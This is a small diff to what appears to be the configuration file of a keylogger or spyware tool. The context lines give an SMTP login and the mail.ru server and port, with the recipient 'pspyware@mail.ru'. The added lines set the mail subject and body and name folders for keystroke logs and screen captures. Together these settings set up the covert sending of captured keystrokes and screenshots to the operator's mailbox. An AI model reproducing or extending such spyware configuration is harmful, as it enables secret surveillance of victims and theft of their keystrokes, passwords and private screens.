--- a/config
+++ b/config
@@ -3,3 +3,7 @@ pass:keylogger11
 server:smtp.mail.ru
 port:465
 to:pspyware@mail.ru
+sbj:Subject_Mail
+body:Body_Mail
+fld_key:Folder_Keylog
+fld_scr:Folder_ScreenLog
